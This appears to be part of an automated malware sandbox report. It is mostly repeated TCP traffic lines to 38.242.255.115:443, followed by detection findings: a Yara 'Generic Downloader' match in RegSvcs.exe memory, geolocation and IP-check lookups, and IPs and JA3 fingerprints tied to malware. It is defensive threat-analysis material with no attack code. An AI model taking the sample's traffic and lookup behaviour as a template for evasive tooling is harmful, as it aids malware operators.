Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NATIXISUS NATIXISUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

May check the online IP address of the machine

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
